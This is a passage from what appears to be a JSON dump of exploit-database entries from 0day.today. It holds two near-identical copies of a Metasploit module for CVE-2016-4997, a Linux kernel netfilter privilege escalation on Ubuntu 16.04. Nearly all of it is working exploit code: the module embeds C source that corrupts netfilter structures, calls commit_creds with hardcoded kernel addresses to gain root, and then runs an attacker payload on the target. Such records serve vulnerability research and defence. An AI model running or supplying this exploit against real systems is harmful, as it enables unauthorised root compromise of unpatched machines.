since metasm bombs for not\r\n having cdefs.h (even if locally installed)\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'h00die <[email\u00a0protected]>', # Module\r\n 'vnik' # Discovery\r\n ],\r\n 'DisclosureDate' => 'Jun 03 2016',\r\n 'Platform' => [ 'linux'],\r\n 'Arch' => [ ARCH_X86 ],\r\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\r\n 'Targets' =>\r\n [\r\n [ 'Ubuntu', { } ]\r\n #[ 'Fedora', { } ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'References' =>\r\n [\r\n [ 'EDB', '40049'],\r\n [ 'CVE', '2016-4997'],\r\n [ 'URL', 'http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ce683e5f9d045e5d67d1312a42b359cb2ab2a13c']\r\n ]\r\n ))\r\n register_options(\r\n [\r\n OptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]),\r\n OptInt.new('MAXWAIT', [ true, 'Max seconds to wait for decrementation in seconds', 180 ]),\r\n OptBool.new('REEXPLOIT', [ true, 'desc already ran, no need to re-run, skip to running pwn',false]),\r\n OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n def iptables_loaded?()\r\n # [email\u00a0protected]:~$ cat /proc/modules | grep ip_tables\r\n # ip_tables 28672 1 iptable_filter, Live 0x0000000000000000\r\n # x_tables 36864 2 iptable_filter,ip_tables, Live 0x0000000000000000\r\n vprint_status('Checking if ip_tables is loaded in kernel')\r\n if target.name == \"Ubuntu\"\r\n iptables = cmd_exec('cat /proc/modules | grep ip_tables')\r\n if iptables.include?('ip_tables')\r\n vprint_good('ip_tables.ko is loaded')\r\n else\r\n print_error('ip_tables.ko is not loaded. root needs to run iptables -L or similar command')\r\n end\r\n return iptables.include?('ip_tables')\r\n elsif target.name == \"Fedora\"\r\n iptables = cmd_exec('cat /proc/modules | grep iptable_raw')\r\n if iptables.include?('iptable_raw')\r\n vprint_good('iptable_raw is loaded')\r\n else\r\n print_error('iptable_raw is not loaded. root needs to run iptables -L or similar command')\r\n end\r\n return iptables.include?('iptable_raw')\r\n else\r\n return false\r\n end\r\n end\r\n\r\n def shemsham_installed?()\r\n # we want this to be false.\r\n vprint_status('Checking if shem or sham are installed')\r\n shemsham = cmd_exec('cat /proc/cpuinfo')\r\n if shemsham.include?('shem')\r\n print_error('shem installed, system not vulnerable.')\r\n elsif shemsham.include?('sham')\r\n print_error('sham installed, system not vulnerable.')\r\n else\r\n vprint_good('shem and sham not present.')\r\n end\r\n return (shemsham.include?('shem') or shemsham.include?('sham'))\r\n end\r\n\r\n if iptables_loaded?() and not shemsham_installed?()\r\n return CheckCode::Appears\r\n else\r\n return CheckCode::Safe\r\n end\r\n end\r\n\r\n def exploit\r\n # first thing we need to do is determine our method of exploitation: compiling realtime, or droping a pre-compiled version.\r\n def has_prereqs?()\r\n vprint_status('Checking if 32bit C libraries, gcc-multilib, and gcc are installed')\r\n if target.name == \"Ubuntu\"\r\n lib = cmd_exec('dpkg --get-selections | grep libc6-dev-i386')\r\n if lib.include?('install')\r\n vprint_good('libc6-dev-i386 is installed')\r\n else\r\n print_error('libc6-dev-i386 is not installed. Compiling will fail.')\r\n end\r\n multilib = cmd_exec('dpkg --get-selections | grep ^gcc-multilib')\r\n if multilib.include?('install')\r\n vprint_good('gcc-multilib is installed')\r\n else\r\n print_error('gcc-multilib is not installed. Compiling will fail.')\r\n end\r\n gcc = cmd_exec('which gcc')\r\n if gcc.include?('gcc')\r\n vprint_good('gcc is installed')\r\n else\r\n print_error('gcc is not installed. Compiling will fail.')\r\n end\r\n return gcc.include?('gcc') && lib.include?('install') && multilib.include?('install')\r\n elsif target.name == \"Fedora\"\r\n lib = cmd_exec('dnf list installed | grep -E \\'(glibc-devel.i686|libgcc.i686)\\'')\r\n if lib.include?('glibc')\r\n vprint_good('glibc-devel.i686 is installed')\r\n else\r\n print_error('glibc-devel.i686 is not installed. Compiling will fail.')\r\n end\r\n if lib.include?('libgcc')\r\n vprint_good('libgcc.i686 is installed')\r\n else\r\n print_error('libgcc.i686 is not installed. Compiling will fail.')\r\n end\r\n multilib = false #not implemented\r\n gcc = false #not implemented\r\n return (lib.include?('glibc') && lib.include?('libgcc')) && gcc && multilib\r\n else\r\n return false\r\n end\r\n end\r\n\r\n compile = false\r\n if datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True'\r\n if has_prereqs?()\r\n compile = true\r\n vprint_status('Live compiling exploit on system')\r\n else\r\n vprint_status('Dropping pre-compiled exploit on system')\r\n end\r\n end\r\n if check != CheckCode::Appears\r\n fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')\r\n end\r\n\r\n desc_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8)\r\n env_ready_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8)\r\n pwn_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8)\r\n payload_file = rand_text_alpha(8)\r\n payload_path = \"#{datastore[\"WritableDir\"]}/#{payload_file}\"\r\n\r\n # direct copy of code from exploit-db, except removed the check for shem/sham and ip_tables.ko since we can do that in the check area here\r\n # removed #include <netinet/in.h> per busterb comment in PR 7326\r\n decr = %q{\r\n #define _GNU_SOURCE\r\n #include <stdio.h>\r\n #include <stdlib.h>\r\n #include <string.h>\r\n #include <unistd.h>\r\n #include <sched.h>\r\n #include <netinet/in.h>\r\n #include <linux/sched.h>\r\n #include <errno.h>\r\n #include <sys/types.h>\r\n #include <sys/socket.h>\r\n #include <sys/ptrace.h>\r\n #include <net/if.h>\r\n #include <linux/netfilter_ipv4/ip_tables.h>\r\n #include <linux/netlink.h>\r\n #include <fcntl.h>\r\n #include <sys/mman.h>\r\n\r\n #define MALLOC_SIZE 66*1024\r\n\r\n int decr(void *p) {\r\n int sock, optlen;\r\n int ret;\r\n void *data;\r\n struct ipt_replace *repl;\r\n struct ipt_entry *entry;\r\n struct xt_entry_match *ematch;\r\n struct xt_standard_target *target;\r\n unsigned i;\r\n\r\n sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW);\r\n\r\n if (sock == -1) {\r\n perror(\"socket\");\r\n return -1;\r\n }\r\n\r\n data = malloc(MALLOC_SIZE);\r\n\r\n if (data == NULL) {\r\n perror(\"malloc\");\r\n return -1;\r\n }\r\n\r\n memset(data, 0, MALLOC_SIZE);\r\n\r\n repl = (struct ipt_replace *) data;\r\n repl->num_entries = 1;\r\n repl->num_counters = 1;\r\n repl->size = sizeof(*repl) + sizeof(*target) + 0xffff;\r\n repl->valid_hooks = 0;\r\n\r\n entry = (struct ipt_entry *) (data + sizeof(struct ipt_replace));\r\n entry->target_offset = 74; // overwrite target_offset\r\n entry->next_offset = sizeof(*entry) + sizeof(*ematch) + sizeof(*target);\r\n\r\n ematch = (struct xt_entry_match *) (data + sizeof(struct ipt_replace) + sizeof(*entry));\r\n\r\n strcpy(ematch->u.user.name, \"icmp\");\r\n void *kmatch = (void*)mmap((void *)0x10000, 0x1000, 7, 0x32, 0, 0);\r\n uint64_t *me = (uint64_t *)(kmatch + 0x58);\r\n *me = 0xffffffff821de10d; // magic number!\r\n\r\n uint32_t *match = (uint32_t *)((char *)&ematch->u.kernel.match + 4);\r\n *match = (uint32_t)kmatch;\r\n\r\n ematch->u.match_size = (short)0xffff;\r\n\r\n target = (struct xt_standard_target *)(data + sizeof(struct ipt_replace) + 0xffff + 0x8);\r\n uint32_t *t = (uint32_t *)target;\r\n *t = (uint32_t)kmatch;\r\n\r\n printf(\"[!] Decrementing the refcount. This may take a while...\\n\");\r\n printf(\"[!] Wait for the \\\"Done\\\" message (even if you'll get the prompt back).\\n\");\r\n\r\n for (i = 0; i < 0xffffff/2+1; i++) {\r\n ret = setsockopt(sock, SOL_IP, IPT_SO_SET_REPLACE, (void *) data, 66*1024);\r\n }\r\n\r\n close(sock);\r\n free(data);\r\n printf(\"[+] Done! Now run ./pwn\\n\");\r\n\r\n return 0;\r\n }\r\n\r\n int main(void) {\r\n void *stack;\r\n int ret;\r\n\r\n printf(\"netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik\\n\");\r\n\r\n ret = unshare(CLONE_NEWUSER);\r\n\r\n if (ret == -1) {\r\n perror(\"unshare\");\r\n return -1;\r\n }\r\n\r\n stack = (void *) malloc(65536);\r\n\r\n if (stack == NULL) {\r\n perror(\"malloc\");\r\n return -1;\r\n }\r\n\r\n clone(decr, stack + 65536, CLONE_NEWNET, NULL);\r\n\r\n sleep(1);\r\n\r\n return 0;\r\n }\r\n }\r\n\r\n # direct copy of code from exploit-db\r\n pwn = %q{\r\n #include <stdio.h>\r\n #include <string.h>\r\n #include <errno.h>\r\n #include <unistd.h>\r\n #include <stdint.h>\r\n #include <fcntl.h>\r\n #include <sys/mman.h>\r\n #include <assert.h>\r\n\r\n #define MMAP_ADDR 0xff814e3000\r\n #define MMAP_OFFSET 0xb0\r\n\r\n typedef int __attribute__((regparm(3))) (*commit_creds_fn)(uint64_t cred);\r\n typedef uint64_t __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(uint64_t cred);\r\n\r\n void __attribute__((regparm(3))) privesc() {\r\n commit_creds_fn commit_creds = (void *)0xffffffff810a21c0;\r\n prepare_kernel_cred_fn prepare_kernel_cred = (void *)0xffffffff810a25b0;\r\n commit_creds(prepare_kernel_cred((uint64_t)NULL));\r\n }\r\n\r\n int main() {\r\n void *payload = (void*)mmap((void *)MMAP_ADDR, 0x400000, 7, 0x32, 0, 0);\r\n assert(payload == (void *)MMAP_ADDR);\r\n\r\n void *shellcode = (void *)(MMAP_ADDR + MMAP_OFFSET);\r\n\r\n memset(shellcode, 0, 0x300000);\r\n\r\n void *ret = memcpy(shellcode, &privesc, 0x300);\r\n assert(ret == shellcode);\r\n\r\n printf(\"[+] Escalating privs...\\n\");\r\n\r\n int fd = open(\"/dev/ptmx\", O_RDWR);\r\n close(fd);\r\n\r\n assert(!getuid());\r\n\r\n printf(\"[+] We've got root!\");\r\n\r\n return execl(\"/bin/bash\", \"-sh\", NULL);\r\n }\r\n }\r\n\r\n # the original code printed a line. However, this is hard to detect due to threading.\r\n # so instead we can write a file in /tmp to catch.\r\n decr.gsub!(/printf\\(\"\\[\\+\\] Done\\! Now run \\.\\/pwn\\\\n\"\\);/,\r\n \"int fd2 = open(\\\"#{env_ready_file}\\\", O_RDWR|O_CREAT, 0777);close(fd2);\" )\r\n\r\n # patch in to run our payload\r\n pwn.gsub!(/execl\\(\"\\/bin\\/bash\", \"-sh\", NULL\\);/,\r\n \"execl(\\\"#{payload_path}\\\", NULL);\")\r\n\r\n def pwn(payload_path, pwn_file, pwn, compile)\r\n # lets write our payload since everythings set for priv esc\r\n vprint_status(\"Writing payload to #{payload_path}\")\r\n write_file(payload_path, generate_payload_exe)\r\n cmd_exec(\"chmod 555 #{payload_path}\")\r\n register_file_for_cleanup(payload_path)\r\n\r\n # now lets drop part 2, and finish up.\r\n rm_f pwn_file\r\n if compile\r\n print_status \"Writing pwn executable to #{pwn_file}.c\"\r\n rm_f \"#{pwn_file}.c\"\r\n write_file(\"#{pwn_file}.c\", pwn)\r\n cmd_exec(\"gcc #{pwn_file}.c -O2 -o #{pwn_file}\")\r\n register_file_for_cleanup(\"#{pwn_file}.c\")\r\n else\r\n print_status \"Writing pwn executable to #{pwn_file}\"\r\n write_file(pwn_file, pwn)\r\n end\r\n register_file_for_cleanup(pwn_file)\r\n cmd_exec(\"chmod +x #{pwn_file}; #{pwn_file}\")\r\n end\r\n\r\n if not compile # we need to override with our pre-created binary\r\n # pwn file\r\n path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-pwn.out')\r\n fd = ::File.open( path, \"rb\")\r\n pwn = fd.read(fd.stat.size)\r\n fd.close\r\n # desc file\r\n path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-decr.out')\r\n fd = ::File.open( path, \"rb\")\r\n decr = fd.read(fd.stat.size)\r\n fd.close\r\n\r\n # overwrite the hardcoded variable names in the compiled versions\r\n env_ready_file = '/tmp/okDjTFSS'\r\n payload_path = '/tmp/2016_4997_payload'\r\n end\r\n\r\n # check for shortcut\r\n if datastore['REEXPLOIT']\r\n pwn(payload_path, pwn_file, pwn, compile)\r\n else\r\n rm_f desc_file\r\n if compile\r\n print_status \"Writing desc executable to #{desc_file}.c\"\r\n rm_f \"#{desc_file}.c\"\r\n write_file(\"#{desc_file}.c\", decr)\r\n register_file_for_cleanup(\"#{desc_file}.c\")\r\n output = cmd_exec(\"gcc #{desc_file}.c -m32 -O2 -o #{desc_file}\")\r\n else\r\n write_file(desc_file, decr)\r\n end\r\n rm_f env_ready_file\r\n register_file_for_cleanup(env_ready_file)\r\n #register_file_for_cleanup(desc_file)\r\n if not file_exist?(desc_file)\r\n vprint_error(\"gcc failure output: #{output}\")\r\n fail_with(Failure::Unknown, \"#{desc_file}.c failed to compile\")\r\n end\r\n if target.name == \"Ubuntu\"\r\n vprint_status \"Executing #{desc_file}, may take around 35s to finish. Watching for #{env_ready_file} to be created.\"\r\n elsif target.name == \"Fedora\"\r\n vprint_status \"Executing #{desc_file}, may take around 80s to finish. Watching for #{env_ready_file} to be created.\"\r\n end\r\n cmd_exec(\"chmod +x #{desc_file}; #{desc_file}\")\r\n sec_waited = 0\r\n\r\n until sec_waited > datastore['MAXWAIT'] do\r\n Rex.sleep(1)\r\n if sec_waited % 10 == 0\r\n vprint_status(\"Waited #{sec_waited}s so far\")\r\n end\r\n\r\n if file_exist?(env_ready_file)\r\n print_good(\"desc finished, env ready.\")\r\n pwn(payload_path, pwn_file, pwn, compile)\r\n return\r\n end\r\n sec_waited +=1\r\n end\r\n end\r\n end\r\nend\n\n# 0day.today [2018-04-11] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/24860"}, {"lastseen": "2018-04-08T09:43:05", "description": "This Metasploit module attempts to exploit a netfilter bug on Linux Kernels before 4.6.3, and currently only works against Ubuntu 16.04 (not 16.04.1) with kernel 4.4.0-21-generic. Several conditions have to be met for successful exploitation.", "edition": 1, "published": "2016-11-24T00:00:00", "title": "Linux Kernel 4.6.3 Netfilter Privilege Escalation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-4997"], "modified": "2016-11-24T00:00:00", "href": "https://0day.today/exploit/description/26412", "id": "1337DAY-ID-26412", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire \"msf/core\"\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = GoodRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Linux Kernel 4.6.3 Netfilter Privilege Escalation',\r\n 'Description' => %q{\r\n This module attempts to exploit a netfilter bug on Linux Kernels befoe 4.6.3, and currently\r\n only works against Ubuntu 16.04 (not 16.04.1) with kernel\r\n 4.4.0-21-generic.\r\n Several conditions have to be met for successful exploitation:\r\n Ubuntu:\r\n 1. ip_tables.ko (ubuntu), iptable_raw (fedora) has to be loaded (root running iptables -L will do such)\r\n 2. libc6-dev-i386 (ubuntu), glibc-devel.i686 & libgcc.i686 (fedora) needs to be installed to compile\r\n Kernel 4.4.0-31-generic and newer are not vulnerable.\r\n\r\n We write the ascii files and compile on target instead of locally since metasm bombs for not\r\n having cdefs.h (even if locally installed)\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'h00die <[email\u00a0protected]>', # Module\r\n 'vnik' # Discovery\r\n ],\r\n 'DisclosureDate' => 'Jun 03 2016',\r\n 'Platform' => [ 'linux'],\r\n 'Arch' => [ ARCH_X86 ],\r\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\r\n 'Targets' =>\r\n [\r\n [ 'Ubuntu', { } ]\r\n #[ 'Fedora', { } ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'References' =>\r\n [\r\n [ 'EDB', '40049'],\r\n [ 'CVE', '2016-4997'],\r\n [ 'URL', 'http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ce683e5f9d045e5d67d1312a42b359cb2ab2a13c']\r\n ]\r\n ))\r\n register_options(\r\n [\r\n OptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]),\r\n OptInt.new('MAXWAIT', [ true, 'Max seconds to wait for decrementation in seconds', 180 ]),\r\n OptBool.new('REEXPLOIT', [ true, 'desc already ran, no need to re-run, skip to running pwn',false]),\r\n OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n def iptables_loaded?()\r\n # [email\u00a0protected]:~$ grep ip_tables /proc/modules\r\n # ip_tables 28672 1 iptable_filter, Live 0x0000000000000000\r\n # x_tables 36864 2 iptable_filter,ip_tables, Live 0x0000000000000000\r\n vprint_status('Checking if ip_tables is loaded in kernel')\r\n if target.name == \"Ubuntu\"\r\n iptables = read_file('/proc/modules')\r\n if iptables.include?('ip_tables')\r\n vprint_good('ip_tables.ko is loaded')\r\n else\r\n print_error('ip_tables.ko is not loaded. root needs to run iptables -L or similar command')\r\n end\r\n return iptables.include?('ip_tables')\r\n elsif target.name == \"Fedora\"\r\n iptables = read_file('/proc/modules')\r\n if iptables.include?('iptable_raw')\r\n vprint_good('iptable_raw is loaded')\r\n else\r\n print_error('iptable_raw is not loaded. root needs to run iptables -L or similar command')\r\n end\r\n return iptables.include?('iptable_raw')\r\n else\r\n return false\r\n end\r\n end\r\n\r\n def shemsham_installed?()\r\n # we want this to be false.\r\n vprint_status('Checking if shem or sham are installed')\r\n shemsham = read_file('/proc/cpuinfo')\r\n if shemsham.include?('shem')\r\n print_error('shem installed, system not vulnerable.')\r\n elsif shemsham.include?('sham')\r\n print_error('sham installed, system not vulnerable.')\r\n else\r\n vprint_good('shem and sham not present.')\r\n end\r\n return (shemsham.include?('shem') or shemsham.include?('sham'))\r\n end\r\n\r\n if iptables_loaded?() and not shemsham_installed?()\r\n return CheckCode::Appears\r\n else\r\n return CheckCode::Safe\r\n end\r\n end\r\n\r\n def exploit\r\n # first thing we need to do is determine our method of exploitation: compiling realtime, or droping a pre-compiled version.\r\n def has_prereqs?()\r\n vprint_status('Checking if 32bit C libraries, gcc-multilib, and gcc are installed')\r\n if target.name == \"Ubuntu\"\r\n lib = cmd_exec('dpkg --get-selections | grep libc6-dev-i386')\r\n if lib.include?('install')\r\n vprint_good('libc6-dev-i386 is installed')\r\n else\r\n print_error('libc6-dev-i386 is not installed. Compiling will fail.')\r\n end\r\n multilib = cmd_exec('dpkg --get-selections | grep ^gcc-multilib')\r\n if multilib.include?('install')\r\n vprint_good('gcc-multilib is installed')\r\n else\r\n print_error('gcc-multilib is not installed. Compiling will fail.')\r\n end\r\n gcc = cmd_exec('which gcc')\r\n if gcc.include?('gcc')\r\n vprint_good('gcc is installed')\r\n else\r\n print_error('gcc is not installed. Compiling will fail.')\r\n end\r\n return gcc.include?('gcc') && lib.include?('install') && multilib.include?('install')\r\n elsif target.name == \"Fedora\"\r\n lib = cmd_exec('dnf list installed | grep -E \\'(glibc-devel.i686|libgcc.i686)\\'')\r\n if lib.include?('glibc')\r\n vprint_good('glibc-devel.i686 is installed')\r\n else\r\n print_error('glibc-devel.i686 is not installed. Compiling will fail.')\r\n end\r\n if lib.include?('libgcc')\r\n vprint_good('libgcc.i686 is installed')\r\n else\r\n print_error('libgcc.i686 is not installed. Compiling will fail.')\r\n end\r\n multilib = false #not implemented\r\n gcc = false #not implemented\r\n return (lib.include?('glibc') && lib.include?('libgcc')) && gcc && multilib\r\n else\r\n return false\r\n end\r\n end\r\n\r\n compile = false\r\n if datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True'\r\n if has_prereqs?()\r\n compile = true\r\n vprint_status('Live compiling exploit on system')\r\n else\r\n vprint_status('Dropping pre-compiled exploit on system')\r\n end\r\n end\r\n if check != CheckCode::Appears\r\n fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')\r\n end\r\n\r\n desc_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8)\r\n env_ready_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8)\r\n pwn_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8)\r\n payload_file = rand_text_alpha(8)\r\n payload_path = \"#{datastore[\"WritableDir\"]}/#{payload_file}\"\r\n\r\n # direct copy of code from exploit-db, except removed the check for shem/sham and ip_tables.ko since we can do that in the check area here\r\n # removed #include <netinet/in.h> per busterb comment in PR 7326\r\n decr = %q{\r\n #define _GNU_SOURCE\r\n #include <stdio.h>\r\n #include <stdlib.h>\r\n #include <string.h>\r\n #include <unistd.h>\r\n #include <sched.h>\r\n #include <netinet/in.h>\r\n #include <linux/sched.h>\r\n #include <errno.h>\r\n #include <sys/types.h>\r\n #include <sys/socket.h>\r\n #include <sys/ptrace.h>\r\n #include <net/if.h>\r\n #include <linux/netfilter_ipv4/ip_tables.h>\r\n #include <linux/netlink.h>\r\n #include <fcntl.h>\r\n #include <sys/mman.h>\r\n\r\n #define MALLOC_SIZE 66*1024\r\n\r\n int decr(void *p) {\r\n int sock, optlen;\r\n int ret;\r\n void *data;\r\n struct ipt_replace *repl;\r\n struct ipt_entry *entry;\r\n struct xt_entry_match *ematch;\r\n struct xt_standard_target *target;\r\n unsigned i;\r\n\r\n sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW);\r\n\r\n if (sock == -1) {\r\n perror(\"socket\");\r\n return -1;\r\n }\r\n\r\n data = malloc(MALLOC_SIZE);\r\n\r\n if (data == NULL) {\r\n perror(\"malloc\");\r\n return -1;\r\n }\r\n\r\n memset(data, 0, MALLOC_SIZE);\r\n\r\n repl = (struct ipt_replace *) data;\r\n repl->num_entries = 1;\r\n repl->num_counters = 1;\r\n repl->size = sizeof(*repl) + sizeof(*target) + 0xffff;\r\n repl->valid_hooks = 0;\r\n\r\n entry = (struct ipt_entry *) (data + sizeof(struct ipt_replace));\r\n entry->target_offset = 74; // overwrite target_offset\r\n entry->next_offset = sizeof(*entry) + sizeof(*ematch) + sizeof(*target);\r\n\r\n ematch = (struct xt_entry_match *) (data + sizeof(struct ipt_replace) + sizeof(*entry));\r\n\r\n strcpy(ematch->u.user.name, \"icmp\");\r\n void *kmatch = (void*)mmap((void *)0x10000, 0x1000, 7, 0x32, 0, 0);\r\n uint64_t *me = (uint64_t *)(kmatch + 0x58);\r\n *me = 0xffffffff821de10d; // magic number!\r\n\r\n uint32_t *match = (uint32_t *)((char *)&ematch->u.kernel.match + 4);\r\n *match = (uint32_t)kmatch;\r\n\r\n ematch->u.match_size = (short)0xffff;\r\n\r\n target = (struct xt_standard_target *)(data + sizeof(struct ipt_replace) + 0xffff + 0x8);\r\n uint32_t *t = (uint32_t *)target;\r\n *t = (uint32_t)kmatch;\r\n\r\n printf(\"[!] Decrementing the refcount. This may take a while...\\n\");\r\n printf(\"[!] Wait for the \\\"Done\\\" message (even if you'll get the prompt back).\\n\");\r\n\r\n for (i = 0; i < 0xffffff/2+1; i++) {\r\n ret = setsockopt(sock, SOL_IP, IPT_SO_SET_REPLACE, (void *) data, 66*1024);\r\n }\r\n\r\n close(sock);\r\n free(data);\r\n printf(\"[+] Done! Now run ./pwn\\n\");\r\n\r\n return 0;\r\n }\r\n\r\n int main(void) {\r\n void *stack;\r\n int ret;\r\n\r\n printf(\"netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik\\n\");\r\n\r\n ret = unshare(CLONE_NEWUSER);\r\n\r\n if (ret == -1) {\r\n perror(\"unshare\");\r\n return -1;\r\n }\r\n\r\n stack = (void *) malloc(65536);\r\n\r\n if (stack == NULL) {\r\n perror(\"malloc\");\r\n return -1;\r\n }\r\n\r\n clone(decr, stack + 65536, CLONE_NEWNET, NULL);\r\n\r\n sleep(1);\r\n\r\n return 0;\r\n }\r\n }\r\n\r\n # direct copy of code from exploit-db\r\n pwn = %q{\r\n #include <stdio.h>\r\n #include <string.h>\r\n #include <errno.h>\r\n #include <unistd.h>\r\n #include <stdint.h>\r\n #include <fcntl.h>\r\n #include <sys/mman.h>\r\n #include <assert.h>\r\n\r\n #define MMAP_ADDR 0xff814e3000\r\n #define MMAP_OFFSET 0xb0\r\n\r\n typedef int __attribute__((regparm(3))) (*commit_creds_fn)(uint64_t cred);\r\n typedef uint64_t __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(uint64_t cred);\r\n\r\n void __attribute__((regparm(3))) privesc() {\r\n commit_creds_fn commit_creds = (void *)0xffffffff810a21c0;\r\n prepare_kernel_cred_fn prepare_kernel_cred = (void *)0xffffffff810a25b0;\r\n commit_creds(prepare_kernel_cred((uint64_t)NULL));\r\n }\r\n\r\n int main() {\r\n void *payload = (void*)mmap((void *)MMAP_ADDR, 0x400000, 7, 0x32, 0, 0);\r\n assert(payload == (void *)MMAP_ADDR);\r\n\r\n void *shellcode = (void *)(MMAP_ADDR + MMAP_OFFSET);\r\n\r\n memset(shellcode, 0, 0x300000);\r\n\r\n void *ret = memcpy(shellcode, &privesc, 0x300);\r\n assert(ret == shellcode);\r\n\r\n printf(\"[+] Escalating privs...\\n\");\r\n\r\n int fd = open(\"/dev/ptmx\", O_RDWR);\r\n close(fd);\r\n\r\n assert(!getuid());\r\n\r\n printf(\"[+] We've got root!\");\r\n\r\n return execl(\"/bin/bash\", \"-sh\", NULL);\r\n }\r\n }\r\n\r\n # the original code printed a line. However, this is hard to detect due to threading.\r\n # so instead we can write a file in /tmp to catch.\r\n decr.gsub!(/printf\\(\"\\[\\+\\] Done\\! Now run \\.\\/pwn\\\\n\"\\);/,\r\n \"int fd2 = open(\\\"#{env_ready_file}\\\", O_RDWR|O_CREAT, 0777);close(fd2);\" )\r\n\r\n # patch in to run our payload\r\n pwn.gsub!(/execl\\(\"\\/bin\\/bash\", \"-sh\", NULL\\);/,\r\n \"execl(\\\"#{payload_path}\\\", NULL);\")\r\n\r\n def pwn(payload_path, pwn_file, pwn, compile)\r\n # lets write our payload since everythings set for priv esc\r\n vprint_status(\"Writing payload to #{payload_path}\")\r\n write_file(payload_path, generate_payload_exe)\r\n cmd_exec(\"chmod 555 #{payload_path}\")\r\n register_file_for_cleanup(payload_path)\r\n\r\n # now lets drop part 2, and finish up.\r\n rm_f pwn_file\r\n if compile\r\n print_status \"Writing pwn executable to #{pwn_file}.c\"\r\n rm_f \"#{pwn_file}.c\"\r\n write_file(\"#{pwn_file}.c\", pwn)\r\n cmd_exec(\"gcc #{pwn_file}.c -O2 -o #{pwn_file}\")\r\n register_file_for_cleanup(\"#{pwn_file}.c\")\r\n else\r\n print_status \"Writing pwn executable to #{pwn_file}\"\r\n write_file(pwn_file, pwn)\r\n end\r\n register_file_for_cleanup(pwn_file)\r\n cmd_exec(\"chmod +x #{pwn_file}; #{pwn_file}\")\r\n end\r\n\r\n if not compile # we need to override with our pre-created binary\r\n # pwn file\r\n path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-pwn.out')\r\n fd = ::File.open( path, \"rb\")\r\n pwn = fd.read(fd.stat.size)\r\n fd.close\r\n # desc file\r\n path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-decr.out')\r\n fd = ::File.open( path, \"rb\")\r\n decr = fd.read(fd.stat.size)\r\n fd.close\r\n\r\n # overwrite the hardcoded variable names in the compiled versions\r\n env_ready_file = '/tmp/okDjTFSS'\r\n payload_path = '/tmp/2016_4997_payload'\r\n end\r\n\r\n # check for shortcut\r\n if datastore['REEXPLOIT']\r\n pwn(payload_path, pwn_file, pwn, compile)\r\n else\r\n rm_f desc_file\r\n if compile\r\n print_status \"Writing desc executable to #{desc_file}.c\"\r\n rm_f \"#{desc_file}.c\"\r\n write_file(\"#{desc_file}.c\", decr)\r\n register_file_for_cleanup(\"#{desc_file}.c\")\r\n output = cmd_exec(\"gcc #{desc_file}.c -m32 -O2 -o #{desc_file}\")\r\n else\r\n write_file(desc_file, decr)\r\n end\r\n rm_f env_ready_file\r\n register_file_for_cleanup(env_ready_file)\r\n #register_file_for_cleanup(desc_file)\r\n if not file_exist?(desc_file)\r\n vprint_error(\"gcc failure output: #{output}\")\r\n fail_with(Failure::Unknown, \"#{desc_file}.c failed to compile\")\r\n end\r\n if target.name == \"Ubuntu\"\r\n vprint_status \"Executing #{desc_file}, may take around 35s to finish. Watching for #{env_ready_file} to be created.\"\r\n elsif target.name == \"Fedora\"\r\n vprint_status \"Executing #{desc_file}, may take around 80s to finish. Watching for #{env_ready_file} to be created.\"\r\n end\r\n cmd_exec(\"chmod +x #{desc_file}; #{desc_file}\")\r\n sec_waited = 0\r\n\r\n until sec_waited > datastore['MAXWAIT'] do\r\n Rex.sleep(1)\r\n if sec_waited % 10 == 0\r\n vprint_status(\"Waited #{sec_waited}s so far\")\r\n end\r\n\r\n if file_exist?(env_ready_file)\r\n print_good(\"desc finished, env ready.\")\r\n pwn(payload_path, pwn_file, pwn, compile)\r\n return\r\n end\r\n sec_waited +=1\r\n end\r\n end\r\n end\r\nend\n\n# 0day.today [2018-04-08] #", "cvss": {"score": 7.2, "vector": 